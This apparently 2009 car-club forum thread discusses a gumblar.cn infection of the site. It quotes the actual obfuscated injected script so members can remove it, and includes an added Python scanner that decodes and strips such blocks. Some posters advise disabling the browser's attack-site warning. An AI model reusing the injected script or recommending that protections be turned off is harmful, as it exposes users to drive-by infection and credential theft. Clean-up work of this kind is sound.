Forums suffering virus/trojan infection

riske

Guest
I'm using Google Chrome on my laptop now and it just tried blocking me cos of the gumblar.cn shit thing. But on Mozilla it's all good?? I'll do some checks and download some more spyware crap and antivirus
 

GTiR-Aholic

New Member
Rishi, use the link below for information on the gumblar.cn phishing script.. it tells you what to look for in your blog pages so that you know which lines of code to remove and if you have a good known backup .. you can restore those pages easily enough hopefully without sacrificing the database.

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

I did a quick search on the source code for the page: gtiroc.com/forums/showthread.php and found the following phishing script which gumblar.cn uses:

<script language=javascript><!--
(function(uAJd){var WVyrT=('v:61r:20a:3d:22Script:45n:67ine:22:2cb:3d:22:56e:72:73ion()+:22:2cj:3d:22:22:2c:75:3dnavigat:6f:72:2euser:41:67ent:3bif((u:2eind:65xO:66:)22:57in:22:29:3e0):26:26(u:2einde:78Of:)22NT:206:22:29:3c0):26:26:28d:6fc:75ment:2e:63:6f:6f:6bie:2eind:65xO:66:28:22mie:6b:3d1:22):3c0):26:26(typeof:)7arv:7ats):21:3d:74ypeof:)22A:22):29):7bzrvzts:3d:22A:22:3be:76a:6c:)22:69f:)77i:6edow:2e:22+a+:22)j:3d:6a+:22:2ba+:22Major:22+:62+a+:22Min:6fr:22+b+:61+:22:42:75:69ld:22+b+:22j:3b:22):3bdoc:75ment:2ew:72:69t:65:)22:3csc:72:69p:74:20sr:63:3d:2f:2fgu:6dblar:2e:63n:2frs:73:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73:63r:69p:74:3e:22:29:3b:7d').replace(uAJd,'%');var y8FVs=unescape(WVyrT);eval(y8FVs)})(/:/g);
--></script>



It's just before the </head> tag and will most likely be in more than 1 php file.. ftp in and delete it from all the php files under /forums/ then let's try the site again and see if it still happens :)
 
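Added example (not part of the original thread and not code from any poster): a Python scanner for the clean-up described in the post above. It finds inline script blocks with the same wrapper shape as the one quoted, decodes the hidden script statically without running it, and can strip the block. The function names, the sample page and the host `malware.example` are constructed for illustration.

```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote

# Wrapper shape taken from the block quoted in the post: an inline <script> holding
# (function(X){var Y=('...').replace(X,'%');var Z=unescape(Y);eval(Z)})(/DELIM/g);
# Other variants may differ, so a clean scan only means "not this shape".
INJECTED = re.compile(
    r"<script\b[^>]*>\s*(?:<!--)?\s*\(function\((\w+)\)\s*\{\s*var\s+\w+\s*=\s*"
    r"\('(?P<blob>[^']{1,20000})'\)\.replace\(\1,\s*'%'\);.{0,200}?unescape\(\w+\);"
    r"\s*eval\(\w+\);?\s*\}\)\(/(?P<delim>[^/]{1,8})/g\);?\s*(?:-->)?\s*</script>[ \t]*\n?",
    re.IGNORECASE | re.DOTALL,
)

def scan_text(text):
    """Return (offset, decoded_script) for each injected block; nothing is executed."""
    hits = []
    for m in INJECTED.finditer(text):
        # Same transform the wrapper applies: delimiter -> '%', then percent-decode.
        # Assumption: the delimiter regex is a literal string such as ':'.
        blob = m.group("blob").replace(m.group("delim"), "%")
        hits.append((m.start(), unquote(blob, encoding="latin-1")))
    return hits

def clean_text(text):
    """Return text with every matching block removed; the rest is untouched."""
    return INJECTED.sub("", text)

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Yield (path, offset, decoded_script) for every hit under root."""
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            for off, decoded in scan_text(path.read_text(errors="replace")):
                yield path, off, decoded

# Constructed sample: same wrapper, harmless placeholder payload and host.
PLACEHOLDER_JS = 'document.write("<script src=//malware.example/x.js><\\/script>")'
SAMPLE = (
    "<html><head><title>Forum</title>\n<script language=javascript><!--\n"
    "(function(a){var b=('" + "".join(":%02x" % ord(c) for c in PLACEHOLDER_JS)
    + "').replace(a,'%');var c=unescape(b);eval(c)})(/:/g);\n--></script>\n"
    "</head><body>ok</body></html>"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, off, decoded in scan_tree(sys.argv[1]):
            print(f"{path}: offset {off}: {decoded[:120]!r}")
    else:
        print(scan_text(SAMPLE))
```

Run it against a downloaded copy of the site rather than the live server, and compare any file it flags with the known-good backup before writing the cleaned text back.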

Rishi

Still waiting on some shims!
I've been looking for answers to this for ages.. I've got all the files I need to replace but I need to take a complete backup (not just a DB backup) which I will need to do on Wednesday when I am back on a fast connection..
 

GTiR-Aholic

New Member
No probs dude, until then I will run this site whilst my speakers are on mute because every time I load a new page the Kaspersky security centre screams like a bitch!!! lol
 

jjs

Member
Hi, I usually log on to this site at work; it will no longer let me log on, comes up with trojan virus, redirecting. Work uses McAfee virus software. Any ideas? Also when I log on at home, it keeps saying redirecting, doesn't automatically log on like it used to.
 

GTiR-Aholic

New Member
yeah check 2 posts up.. I put a link in the post with information regarding the problem, Rishi will be sorting it soon hopefully this week :)
If it asks you to allow/decline the "gumblar.cn" script just click decline.. it should still load the page but will not allow the script to access your private data i.e. passwords etc.
 

Tim

New Member
Even my Mac is now warning me of malware on this site ... if Rishi is too busy to sort this, I don't mind helping out.
 

gtirjoey

Member
I don't really know anything about computers but if I load up Mozilla and try gtiroc.com it blocks the site and says Google has found harmful software on this website.
 

saddler

Active Member
I don't really know anything about computers but if I load up Mozilla and try gtiroc.com it blocks the site and says Google has found harmful software on this website.
Go into Tools, Options and untick "Tell me if the site I'm visiting is a suspected attack site".
 

gtiroz

Administrator
Staff member
just for admin/tech reference:

on a mac running 10.5.x using firefox 3.x
have been browsing daily but warnings only started in the last 24 hours...

(turning off the firefox security works as per above wintel procedure)
 

riske

Guest
Safe Browsing
Diagnostic page for gtiroc.com

What is the current listing status for gtiroc.com?
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 146 pages we tested on the site over the past 90 days, 14 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-15, and the last time suspicious content was found on this site was on 2009-05-15.
Malicious software includes 57 scripting exploit(s).

Malicious software is hosted on 1 domain(s), including gumblar.cn/.

This site was hosted on 1 network(s) including AS15244 (ADDD2NET).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, gtiroc.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.




Latest update of what I keep getting
 